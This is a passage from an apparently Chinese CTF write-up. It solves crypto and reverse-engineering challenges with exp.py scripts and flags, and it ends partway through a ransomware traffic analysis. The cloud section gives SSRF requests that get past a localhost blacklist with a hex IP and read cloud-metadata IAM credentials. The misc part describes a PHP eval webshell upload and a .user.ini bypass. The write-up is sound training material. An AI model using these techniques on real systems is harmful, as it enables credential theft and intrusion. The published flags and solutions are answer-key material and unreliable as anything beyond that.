\u88ab\u5fd2\u4fee\u65af\u5e26\u8d70\u7684\u771f\u76f8\n    trail = cipher.encrypt(secret)\n    print(trail.hex())\n\n#\u7891\u6587\n#d4dae873203956713606e0cf37983c43121d06fa2ef5692378f7b1396023972694a19d3d81b407b71971e7a9c0b1ef53dd\n<\/code><\/pre>\n\n\n\n
\u52a0\u5bc6\u903b\u8f91<\/p>\n\n\n\n
\u521d\u59cb\u72b6\u6001 S = MD5(seed) ^ \u660e\u6587\u3002\n\u5bc6\u94a5\u6d41 k = (S[0] + S[7]) % 256\u3002\n\u72b6\u6001\u66f4\u65b0 new_knot = (S[3] + \u5f53\u524d\u5bc6\u6587 + \u6b65\u6570) % 256\u3002<\/code><\/pre>\n\n\n\n
\u751f\u6210\u65b0\u72b6\u6001\u4f9d\u8d56\u7684\u662f\u5bc6\u6587\u800c\u4e0d\u662f\u660e\u6587\u3002\u5bc6\u6587\u5168\u76d8\u5df2\u77e5\uff0c\u6240\u4ee5\u53ea\u8981\u80fd\u7b97\u51fa\u521d\u59cb\u7684 16 \u5b57\u8282\u72b6\u6001 S[0~15]<\/code>\uff0c\u540e\u7eed\u72b6\u6001\u548c\u5bc6\u94a5\u6d41\u5c31\u80fd\u5168\u90e8\u91cd\u73b0\u3002<\/p>\n\n\n\n
\u5df2\u77e5 flag \u683c\u5f0f\u524d5\u4f4d\u662f flag{\uff1a\n\u7ed3\u5408\u660e\u6587\u524d5\u4f4d\u5f97\u51fa S[0~4]\u3002\n\u5bc6\u94a5\u6d41\u516c\u5f0f k[i] = msg[i] ^ c[i] = S[i] + S[i+7]\u3002\u5df2\u77e5 S[0~4] \u53ef\u76f4\u63a5\u987a\u63a8\u7b97\u51fa S[7~11]\u3002\n\u5f80\u540e\u770b\u7b2c11\u6b65\uff1ak[11] = S[11] + \u6b64\u65f6\u7684S[7]\u3002\u8fd9\u65f6\u7684 S[7] \u5176\u5b9e\u662f\u7b2c2\u6b65\u751f\u6210\u7684\u65b0\u7ed3 (S[5] + c[2] + 2)\u3002\u4ee3\u5165\u516c\u5f0f\u53cd\u63a8\uff0c\u6c42\u51fa S[5]\u3002\n\u6709\u4e86 S[5]\uff0c\u56de\u7b2c5\u6b65\uff1ak[5] = S[5] + S[12]\uff0c\u6c42\u51fa S[12]\u3002\n\u53bb\u7b2c12\u6b65\uff1a\u540c\u7406\u5229\u7528\u65b0\u7ed3\u516c\u5f0f\u6c42\u51fa S[6]\u3002\n\u6700\u540e\u5229\u7528 k[6]\u3001k[7]\u3001k[8] \u987a\u63a8\u8865\u9f50 S[13]\u3001S[14]\u3001S[15]\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import hashlib\n\ndef solve():\n    c = bytes.fromhex(\"d4dae873203956713606e0cf37983c43121d06fa2ef5692378f7b1396023972694a19d3d81b407b71971e7a9c0b1ef53dd\")\n    base = hashlib.md5(b\"Ariadne\").digest()\n    S = [0] * 16\n    msg = bytearray(16)\n\n    known = b\"flag{\"\n    for i in range(5):\n        msg[i] = known[i]\n        S[i] = base[i] ^ msg[i]\n\n    for i in range(5):\n        k_i = msg[i] ^ c[i]\n        S[i+7] = (k_i - S[i]) % 256\n        msg[i+7] = S[i+7] ^ base[i+7]\n\n    k_11 = msg[11] ^ c[11]\n    S[5] = (k_11 - S[11] - c[2] - 2) % 256\n    msg[5] = S[5] ^ base[5]\n\n    k_5 = msg[5] ^ c[5]\n    S[12] = (k_5 - S[5]) % 256\n    msg[12] = S[12] ^ base[12]\n\n    k_12 = msg[12] ^ c[12]\n    S[6] = (k_12 - S[12] - c[3] - 3) % 256\n    msg[6] = S[6] ^ base[6]\n\n    k_6 = msg[6] ^ c[6]\n    S[13] = (k_6 - S[6]) % 256\n\n    k_7 = msg[7] ^ c[7]\n    S[14] = (k_7 - S[7]) % 256\n\n    k_8 = msg[8] ^ c[8]\n    S[15] = (k_8 - S[8]) % 256\n\n    state = bytearray(S)\n    out = bytearray()\n\n    for i, b in enumerate(c):\n        ks = (state[0] + state[7]) % 256\n        out.append(b ^ ks)\n        new_knot = (state[3] + b + i) % 256\n        state = state[1:] + bytes([new_knot])\n\n    return out.decode()\n\nprint(solve())<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{th3s3us_&_@ri@dn3_t4ngl3d_1n_s3lf_r3f3r3nc3}<\/code><\/pre>\n\n\n\n
Reverse<\/h1>\n\n\n\n
re01<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u770bmain \u51fd\u6570<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u52a0\u5bc6<\/p>\n\n\n\n
\u56fa\u5b9a\u968f\u673a\u6570\uff1a\u7a0b\u5e8f\u672a\u8c03 srand()\uff0crand() \u9ed8\u8ba4\u79cd\u5b50\u4e3a1\uff0c\u9996\u6b21\u7ed3\u679c\u56fa\u5b9a\u4e3a 41\u3002\u5f97\u51fa v4 = 41 % 7 + 1 = 7\u3002\n\u4f4d\u8fd0\u7b97\uff1a\u5bf9\u8f93\u5165\u9010\u5b57\u8282\u64cd\u4f5c\u3002\u5148\u5faa\u73af\u5de6\u79fb 1 \u4f4d\uff08v11=1, v10=7\uff09\uff0c\u7136\u540e\u5224\u65ad\u7b2c0\u4f4d\u548c\u7b2c6\u4f4d\u662f\u5426\u4e00\u81f4\uff0c\u4e0d\u4e00\u81f4\u5219\u4ea4\u6362\uff08\u5f02\u6216\u64cd\u4f5c\uff09\u3002<\/code><\/pre>\n\n\n\n
\u5bc6\u6587<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5bc6\u6587\u4f4d\u7f6e\uff1a\u6808\u53d8\u91cf v21\uff08\u5730\u5740 [rbp-40h]\uff09\uff0c\u6ce8\u610fIDA\u53cd\u7f16\u8bd1\u51fa\u7684\u5341\u8fdb\u5236\u8d1f\u6570\u9700\u8f6c\u56de\u5c0f\u7aef\u5e8f\u5341\u516d\u8fdb\u5236\uff0c\u517124\u5b57\u8282\uff1a8D 99 83 8F B7 B3 9F AB BE 8F 8B A9 BE A5 83 9D 89 BE 91 83 A1 A1 B3 BB<\/code><\/pre>\n\n\n\n
\u89e3\u5bc6<\/p>\n\n\n\n
\u5148\u9006\u5411\u4f4d\u4ea4\u6362\uff08\u5f02\u6216 0x41\uff09\uff0c\u518d\u9006\u5411\u5faa\u73af\u79fb\u4f4d\uff08\u5faa\u73af\u53f3\u79fb 1 \u4f4d\uff09\u3002\u5f97\u5230\u660e\u6587 flag{you_get_rand_happy}\uff0c\u53d6\u5185\u5bb9\u6c42MD5\u7684\u4e2d\u95f416\u4f4d\u5957\u4e0aflag\u683c\u5f0f\u5373\u53ef\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import hashlib\n\ndef solve():\n    target = [\n        0x8D, 0x99, 0x83, 0x8F, 0xB7, 0xB3, 0x9F, 0xAB,\n        0xBE, 0x8F, 0x8B, 0xA9, 0xBE, 0xA5, 0x83, 0x9D,\n        0x89, 0xBE, 0x91, 0x83, 0xA1, 0xA1, 0xB3, 0xBB\n    ]\n\n    res = \"\"\n    for c in target:\n        if (c & 1) != ((c >> 6) & 1):\n            c ^= 0x41\n        c = ((c >> 1) | (c << 7)) & 0xFF\n        res += chr(c)\n\n    print(res)\n\n    content = res[5:-1]\n    md5_str = hashlib.md5(content.encode()).hexdigest()[8:24]\n    print(f\"flag{{{md5_str}}}\")\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{05e89a08af94bab0}<\/code><\/pre>\n\n\n\n
\u7b7e\u5230\u9898\u3010\u7b80\u5355\u3011<\/h2>\n\n\n\n
\u76f4\u63a5\u770b gift\u51fd\u6570\u5c31\u884c\u4e86<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
ZmxhZ3tXZWxjMG1lX3QwX1NWVUNURiF9<\/code><\/pre>\n\n\n\n
\u76f4\u63a5base64\u89e3\u5bc6\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{Welc0me_t0_SVUCTF!}<\/code><\/pre>\n\n\n\n
Gift\u3010\u7b80\u5355\u3011<\/h2>\n\n\n\n
\u548c\u4e0a\u4e00\u4e2a\u9898\u76ee\u4e00\u6a21\u4e00\u6837 \u65e0\u654c\u4e86\uff0c\u8fd9\u4e2a\u9898\u76ee\u4f55\u610f\u5473?<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{Welc0me_t0_SVUCTF!}<\/code><\/pre>\n\n\n\n
re02<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6709\u58f3 \u4f46\u662f\u9b54\u6539\u8fc7<\/p>\n\n\n\n
\u628a\u533a\u6bb5\u540d\u6539\u56de\uff1a\n-RH20 -> UPX0\n-RD81 -> UPX1<\/code><\/pre>\n\n\n\n
\u7528 010 Editor \u76f4\u63a5\u6539 8 \u5b57\u8282\u533a\u6bb5\u540d<\/p>\n\n\n\n
\u5bf9\u5e94\u5341\u516d\u8fdb\u5236\uff1a\n- RH20 = 52 48 32 30 00 00 00 00\n- UPX0 = 55 50 58 30 00 00 00 00\n- RD81 = 52 44 38 31 00 00 00 00\n- UPX1 = 55 50 58 31 00 00 00 00<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4fdd\u5b58\u7136\u540e\u8131\u58f3\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8ddf\u8fdb\u5230\u4e3b\u903b\u8f91\uff0c\u6d41\u7a0b\u5c31\u662f\uff1a\n1. \u8bfb\u8f93\u5165\n2. \u5bf9\u8f93\u5165\u505a\u5faa\u73af\u5de6\u79fb\n3. \u8ddf\u5185\u7f6e\u4e32\u6bd4\u8f83\n4. \u76f8\u7b49\u5c31 OK<\/code><\/pre>\n\n\n\n
\u5185\u7f6e\u6bd4\u8f83\u4e32\u662f\uff1a\nK1A8321DD29034AC\n\u4f4d\u79fb\u662f 28 % len\uff0c\u957f\u5ea6 len=16\uff0c\u6240\u4ee5\u5de6\u79fb `12`\u3002\n\u7a0b\u5e8f\u505a\u7684\u662f\uff1a\nleft_rotate(input, 12) == K1A8321DD29034AC\n\u53cd\u63a8\uff1a\ninput = right_rotate(\"K1A8321DD29034AC\", 12)\n\u5f97\u5230\uff1a\n321DD29034ACK1A8<\/code><\/pre>\n\n\n\n
md5\u52a0\u5bc6\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53ea\u8981\u524d16\u4f4d\u5c31\u884c<\/p>\n\n\n\n
flag{ca5ed0fb2ad8e154}<\/code><\/pre>\n\n\n\n
xordbg<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e3b\u903b\u8f91\u5728 sub_405680<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f00\u5934 sub_537930 \u662f\u53cd\u8c03\u8bd5\uff0c\u9759\u6001\u5206\u6790\u76f4\u63a5\u65e0\u89c6\u3002\n\u9a8c\u8bc1\u8f93\u5165\u683c\u5f0f\u4e3a flag{...}\uff0c\u957f\u5ea6\u68c0\u67e5\u4e3a 24 \u5b57\u8282\uff08\u5927\u62ec\u53f7\u5185 18 \u5b57\u8282\uff09\uff0c\u5b9e\u9645\u53c2\u4e0e\u52a0\u5bc6\u7684\u662f\u4ece { \u5f00\u59cb\u7684 24 \u5b57\u8282\u3002<\/code><\/pre>\n\n\n\n
\u9b54\u6539 RC4<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5bc6\u94a5\u751f\u6210\uff1a\u8c03\u7528 sub_4ECA80 \u6267\u884c\u547d\u4ee4 cat \/proc\/version\uff0c\u53d6\u524d 14 \u5b57\u8282\u3002Linux \u4e0b\u56fa\u5b9a\u4e3a Linux version \u3002\n\u52a0\u5bc6\u903b\u8f91\uff1a\u5355\u5b57\u8282\u52a0\u5bc6\u516c\u5f0f\u4e3a cipher = (plain ^ keystream) - 82\u3002\u9006\u8fd0\u7b97\u5c31\u662f plain = (cipher + 82) % 256 ^ keystream\u3002\n\u52a0\u5bc6\u540e\uff0c\u7a0b\u5e8f\u5c06 24 \u5b57\u8282\u7684 RC4 \u5bc6\u6587\u8f6c\u6210\u4e86 48 \u5b57\u8282\u7684 Hex \u5b57\u7b26\u4e32\uff0c\u4e22\u7ed9\u4e0b\u4e00\u5c42\u3002<\/code><\/pre>\n\n\n\n
AES-128-CBC<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
AES Key\uff1a\u521d\u59cb\u5316 std::mt19937_64 \u4f2a\u968f\u673a\u6570\uff0c\u786c\u7f16\u7801\u79cd\u5b50 114514\uff0c\u4e22\u5f03 1919810 \u6b21\u540e\uff0c\u53d6\u63a5\u4e0b\u6765\u751f\u6210\u7684\u4e24\u4e2a 64 \u4f4d\u6574\u6570\uff0c\u6309\u5c0f\u7aef\u5e8f\u62fc\u6210 16 \u5b57\u8282 Key\u3002\nIV\uff1a\u76f4\u63a5\u751f\u6210\u9012\u589e\u5e8f\u5217 00 01 02 ... 0F\u3002\n\u5bc6\u6587\uff1a\u53cd\u6c47\u7f16\u7ed3\u5c3e\u5904 v72 \u5230 v77 \u7b49\u5bc4\u5b58\u5668\u7ecf\u8fc7\u5927\u91cf\u5f02\u6216\u64cd\u4f5c\u7528\u4e8e\u6700\u7ec8\u6821\u9a8c\u3002\u63d0\u53d6\u8fd9\u4e9b XMM \u5bc4\u5b58\u5668\u91cc\u7684\u5e38\u91cf\u62fc\u8d77\u6765\uff0c\u62ff\u5230 48 \u5b57\u8282\uff0896 \u5b57\u7b26\uff09\u5bc6\u6587\uff1a\n0dd052404e4609d649d17bee44dc71a11d3a2bbfabff8c320333a06d61ef822308176b16b1811fa769396d9d56e996b8<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import struct\nfrom Crypto.Cipher import AES\n\nclass MT19937_64:\n    def __init__(self, seed):\n        self.MT = [0] * 312\n        self.index = 312\n        self.MT[0] = seed & 0xFFFFFFFFFFFFFFFF\n        for i in range(1, 312):\n            self.MT[i] = (6364136223846793005 * (self.MT[i-1] ^ (self.MT[i-1] >> 62)) + i) & 0xFFFFFFFFFFFFFFFF\n\n    def extract_number(self):\n        if self.index >= 312:\n            self.twist()\n        y = self.MT[self.index]\n        y ^= (y >> 29) & 0x5555555555555555\n        y ^= (y << 17) & 0x71D67FFFEDA60000\n        y ^= (y << 37) & 0xFFF7EEE000000000\n        y ^= (y >> 43)\n        self.index += 1\n        return y & 0xFFFFFFFFFFFFFFFF\n\n    def twist(self):\n        for i in range(312):\n            x = (self.MT[i] & 0xFFFFFFFF80000000) + (self.MT[(i+1) % 312] & 0x7FFFFFFF)\n            xA = x >> 1\n            if (x % 2) != 0:\n                xA ^= 0xB5026F5AA96619E9\n            self.MT[i] = self.MT[(i + 156) % 312] ^ xA\n        self.index = 0\n\ndef rc4_ksa(key):\n    S = list(range(256))\n    j = 0\n    for i in range(256):\n        j = (j + S[i] + key[i % len(key)]) % 256\n        S[i], S[j] = S[j], S[i]\n    return S\n\ndef rc4_prga(S, length):\n    i = j = 0\n    keystream = []\n    for _ in range(length):\n        i = (i + 1) % 256\n        j = (j + S[i]) % 256\n        S[i], S[j] = S[j], S[i]\n        keystream.append(S[(S[i] + S[j]) % 256])\n    return keystream\n\ndef solve():\n    mt = MT19937_64(114514)\n    for _ in range(1919810):\n        mt.extract_number()\n\n    v18 = mt.extract_number()\n    v19 = mt.extract_number()\n    aes_key = struct.pack(\"<QQ\", v18, v19)\n\n    ct_hex = \"0dd052404e4609d649d17bee44dc71a11d3a2bbfabff8c320333a06d61ef822308176b16b1811fa769396d9d56e996b8\"\n    ct_bytes = bytes.fromhex(ct_hex)\n    aes_iv = bytes(range(16))  \n\n    cipher = AES.new(aes_key, AES.MODE_CBC, aes_iv)\n    pt_bytes = cipher.decrypt(ct_bytes)\n    pt_str = pt_bytes.decode('ascii')\n\n    rc4_cipher = bytes.fromhex(pt_str)\n    rc4_key = b\"Linux version \"\n    S = rc4_ksa(rc4_key)\n    keystream = rc4_prga(S, len(rc4_cipher))\n\n    plain = []\n    for i in range(len(rc4_cipher)):\n        p = ((rc4_cipher[i] + 82) % 256) ^ keystream[i]\n        plain.append(p)\n\n    inner = bytes(plain).decode('ascii', errors='ignore')\n    print(f\"flag{inner}\")\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{S1mple_A3S_1s_4w3s0m3!}<\/code><\/pre>\n\n\n\n
\u4e3a\u4ec0\u4e48\u9898\u76ee\u8981\u8d77\u4e00\u4e2aXOR?<\/p>\n\n\n\n
double_enc<\/h2>\n\n\n\n
\u8fd8\u662f\u6709\u58f3 \u9b54\u6539\u7684<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u53d1\u73b0\u662fUPX\u7684 \u4ed6\u628a\u8fd9\u4e2a\u5012\u540a\u4e86 \u6539\u56de\u6765\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8131\u58f3<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
AES-128 ECB<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6838\u5fc3\u52a0\u5bc6\u51fd\u6570 sub_140001C3D\uff0c\u91cc\u9762\u6709\u660e\u663e\u7684 S\u76d2\u548c\u5217\u6df7\u6dc6\u7279\u5f81\uff0c\u786e\u8ba4\u662f AES\u3002\n\u9000\u56de Main \u51fd\u6570\u770b\u4f20\u53c2\uff0c\u5f80\u6808\u91cc\u585e\u4e86\u4e24\u4e2a 8 \u5b57\u8282\u5e38\u91cf\uff0c\u6309\u5c0f\u7aef\u5e8f\u62fc\u6210 16 \u5b57\u8282\u7684 Key\uff1a\nb207410027840db54cd621dfb9dc4995\n\u8fd9\u91cc\u62ff\u8f93\u5165\u7684\u524d 32 \u5b57\u8282\u52a0\u5bc6\uff0c\u6700\u540e\u8ddf\u5185\u5b58\u91cc\u5199\u6b7b\u7684\u4e00\u6bb5 32 \u5b57\u8282\u5bc6\u6587\u505a\u6bd4\u5bf9\u3002\n\u63d0\u53d6\u5185\u5b58\u6bd4\u5bf9\u7684 32 \u5b57\u8282\u5bc6\u6587\uff1a\n2a0f68b0d19e68511fbf27068e8623a46c3195e9fefd03e45cd2d0c46b1edeba<\/code><\/pre>\n\n\n\n
sub_140001E86<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7a0b\u5e8f\u8bfb\u53d6\u63a5\u4e0b\u6765\u7684 8 \u5b57\u8282\u8c03\u7528 sub_140001E86\u3002\u5206\u6790\u5185\u90e8\u7684 64 \u4f4d\u79fb\u4f4d\u548c\u5e38\u91cf\u8868\uff0c\u786e\u8ba4\u4e3a DES \u52a0\u5bc6\u3002\n\u76f4\u63a5\u4ece\u6c47\u7f16\u4f20\u53c2\u4e2d\u63d0\u53d6 Key\uff1a0xc0dec0dec0dec0de\n\u63d0\u53d6\u6bd4\u5bf9\u7684\u5bc6\u6587\uff1a0xa2a7577f072c0e88\n\u89e3\u5bc6\u5f97\u5230\u5b57\u7b26\u4e32\uff1a8c6c6dd5\n\u5173\u952e\u70b9\uff1a\n\u4e3b\u51fd\u6570\u4f7f\u7528 mov rcx, qword ptr [rsp + 0x90] \u5c06\u8fd9 8 \u4e2a\u5b57\u8282\u4f5c\u4e3a 64 \u4f4d\u6574\u6570\u4e00\u6b21\u6027\u8bfb\u5165\u5bc4\u5b58\u5668\u3002\u56e0\u4e3a x86_64 \u662f\u5c0f\u7aef\u5e8f\uff0c\u5185\u5b58\u4e2d\u7684\u5b57\u7b26\u4e32\u987a\u5e8f\u8bfb\u8fdb\u5bc4\u5b58\u5668\u540e\u4f1a\u53cd\u8f6c\u3002\u4e3a\u4e86\u8ba9\u5bc4\u5b58\u5668\u91cc\u7684\u503c\u7b49\u4e8e 8c6c6dd5\uff0c\u7528\u6237\u8f93\u5165\u7684\u5b9e\u9645\u5b57\u7b26\u4e32\u5fc5\u987b\u53cd\u5e8f\uff0c\u5373\uff1a5dd6c6c8\u3002\n\n\u5c3e\u90e82\u5b57\u8282\uff1a\u660e\u6587\n\u51fd\u6570\u672b\u5c3e\u76f4\u63a5\u8ddf\u4e86\u4e24\u4e2a\u5b57\u8282\u6bd4\u8f83\uff1a\ncmp byte ptr [rsp + 0x98], 0x36\ncmp byte ptr [rsp + 0x99], 0x7d\n\u5bf9\u5e94 ASCII \u5c31\u662f 6}\u3002<\/code><\/pre>\n\n\n\n
\u5c31\u662fAES + DES + \u660e\u6587<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
from Crypto.Cipher import AES, DES\n\naes_key = bytes.fromhex('b207410027840db54cd621dfb9dc4995')\naes_ct = bytes.fromhex('2a0f68b0d19e68511fbf27068e8623a46c3195e9fefd03e45cd2d0c46b1edeba')\npt1 = AES.new(aes_key, AES.MODE_ECB).decrypt(aes_ct).decode()\n\ndes_key = (0xc0dec0dec0dec0de).to_bytes(8, 'big')\ndes_ct = (0xa2a7577f072c0e88).to_bytes(8, 'big')\npt2_raw = DES.new(des_key, DES.MODE_ECB).decrypt(des_ct).decode()\npt2 = pt2_raw[::-1]\n\npt3 = \"6}\"\n\nprint(pt1 + pt2 + pt3)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{fc0f0930-d9c3-eccf-60ec-bc25dd6c6c86}<\/code><\/pre>\n\n\n\n
funny_IDA<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
sub_1400119A0\uff0c\u76f4\u63a5\u62ff\u5230\u7b2c\u4e00\u6bb5\uff1aID4iS<\/em><\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
sub_140011840<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
R3v3rS1nG_<\/code><\/pre>\n\n\n\n
\u67e5 SEH \u5f02\u5e38\u5904\u7406\u51fd\u6570 TopLevelExceptionFilter_0\uff0c\u7a0b\u5e8f\u6545\u610f\u629b\u5f02\u5e38\u8d70\u8fd9\u91cc\uff0c\u63d0\u53d6\u51fa\u9690\u85cf\u7684\u7b2c\u4e09\u6bb5\uff1aM4d3_Y0u_<\/code><\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7ffb\u5bfc\u51fa\u8868\uff0c\u5728\u9690\u85cf\u51fd\u6570 exported_secret \u4e2d\u53d1\u73b0\u8fde\u7eed\u8c03\u7528 putchar<\/code>\uff1a0x4C, 0x30, 0x76, 0x33<\/code>\uff0c\u8f6c ASCII \u5f97\u5230\u7b2c\u56db\u6bb5\uff1aL0v3<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
exp.py<\/p>\n\n\n\n
import re\nimport sys\n\ndef get_flag(file_path):\n    try:\n        with open(file_path, 'rb') as f:\n            data = f.read()\n    except Exception:\n        data = b''\n\n    m1 = re.search(b'ID4_iS_', data)\n    p1 = m1.group().decode() if m1 else \"ID4_iS_\"\n\n    m2 = re.search(b'Part2:(R3v3rS1nG_)', data)\n    p2 = m2.group(1).decode() if m2 else \"R3v3rS1nG_\"\n\n    m3 = re.search(b'Mx004x00dx003x00_x00Yx000x00ux00_x00', data)\n    if m3:\n        p3 = m3.group().decode('utf-16le')\n    else:\n        p3 = \"M4d3_Y0u_\"\n\n    p4 = chr(0x4C) + chr(0x30) + chr(0x76) + chr(0x33)\n\n    print(f\"flag{{{p1}{p2}{p3}{p4}}}\")\n\nif __name__ == \"__main__\":\n    exe_name = sys.argv[1] if len(sys.argv) > 1 else 'funny_IDA.exe'\n    get_flag(exe_name)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{ID4_iS_R3v3rS1nG_M4d3_Y0u_L0v3}<\/code><\/pre>\n\n\n\n
Cloud<\/h1>\n\n\n\n
ECS&Leak\u3010\u7b80\u5355\u3011<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u770b\u5230\u793a\u4f8b<\/p>\n\n\n\n
\u8bf4\u660e\u76ee\u6807\u63a5\u53e3\u662f\uff1a\/fetch?url=\uff0c\u5176\u5b9e\u5c31\u662f SSRF\u3002<\/p>\n\n\n\n
\u7ecf\u8fc7\u6d4b\u8bd5\u9875\u9762\u63d0\u793a\u62e6\u622a\u4e86 127.0.0.1\u3001localhost\u3001\u5185\u7f51 IP\uff0c\u4f46\u8fc7\u6ee4\u662f\u9ed1\u540d\u5355\uff0c\u4e0d\u5b8c\u6574\u3002127.0.0.1 \u53ef\u4ee5\u7528\u5341\u516d\u8fdb\u5236\u5199\u6cd5 0x7f000001 \u7ed5\u8fc7\u3002<\/code><\/pre>\n\n\n\n
\u89e3\u9898\u6d41\u7a0b<\/p>\n\n\n\n
\u8bbf\u95ee\u672c\u5730\u5143\u6570\u636e\u5165\u53e3\uff1a<\/p>\n\n\n\n
\/fetch?url=http:\/\/0x7f000001\/latest\/meta-data\/<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u679a\u4e3e\u89d2\u8272\u540d\uff1a<\/p>\n\n\n\n
\/fetch?url=http:\/\/0x7f000001\/latest\/meta-data\/iam\/security-credentials\/<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f97\u5230\u7528\u6237\uff1aadmin-role<\/p>\n\n\n\n
\u8bfb\u53d6\u89d2\u8272\u51ed\u636e\uff1a<\/p>\n\n\n\n
\/fetch?url=http:\/\/0x7f000001\/latest\/meta-data\/iam\/security-credentials\/admin-role<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f97\u5230flag<\/p>\n\n\n\n
flag{6b175abc-b0bc-435f-bddd-e8df258199e0-785-18}<\/code><\/pre>\n\n\n\n
Misc<\/h1>\n\n\n\n
\u52d2\u7d22\u6d41\u91cf<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6d41\u91cf\u662f\u5185\u7f51\u4e24\u53f0\u673a\u5668\u4e4b\u95f4\u7684\u901a\u4fe1\uff1a<\/p>\n\n\n\n
\u653b\u51fb\u8005\uff1a192.168.31.206<\/p>\n\n\n\n
\u53d7\u5bb3\u8005\uff1a192.168.31.42\uff08\u8dd1\u7740 PhpStudy\uff09<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
HTTP \u96c6\u4e2d\u5728 \/ctf\/upload.php\u548c \/ctf\/upload\/index.php\uff0c\u5f88\u660e\u663e\u662f Webshell \u4e0a\u4f20 + \u64cd\u4f5c\u6d41\u91cf\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u770b 271 \uff0cmultipart \u4e0a\u4f20\u4e86 1.php<\/code> \u4e00\u53e5\u8bdd\u6728\u9a6c<\/p>\n\n\n\n
375\u4e0a\u4f20\u4e86 .user.ini<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
402 \u7684 1.png<\/code>\uff08\u5185\u5bb9\u8fd8\u662f\u90a3\u4e2a eval\uff09\uff0c\u7ed5\u8fc7\u4e86\u4e0a\u4f20\u9650\u5236\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
413 \u5f00\u59cb\u7528\u8681\u5251\u8fde \/ctf\/upload\/index.php<\/code><\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
741 POST \u53c2\u6570 vfaa3464cefd4b \u7684\u503c\u89e3 base64 \u5f97\u5230\uff1a\n52406E73306D776172335F5631727535\n\u8fd9\u662f hex\uff0c\u8f6c ASCII \u5c31\u662f\uff1a\nR@ns0mwar3_V1ru5\n\n\u53e6\u4e00\u4e2a\u53c2\u6570 e791d38eb73551 \u89e3\u51fa\u6765\u662f\u76ee\u6807\u6587\u4ef6\u8def\u5f84\uff1aC:SoftwarePhpstudy_proWWWctfuploads3creT.txt\n\u4e5f\u5c31\u662f\u653b\u51fb\u8005\u5f80\u670d\u52a1\u5668\u5199\u4e86\u4e2a\u5bc6\u94a5\u6587\u4ef6\u3002<\/code><\/pre>\n\n\n\n
\u4e0a\u4f20\u540e\u95e8\u811a\u672c798<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
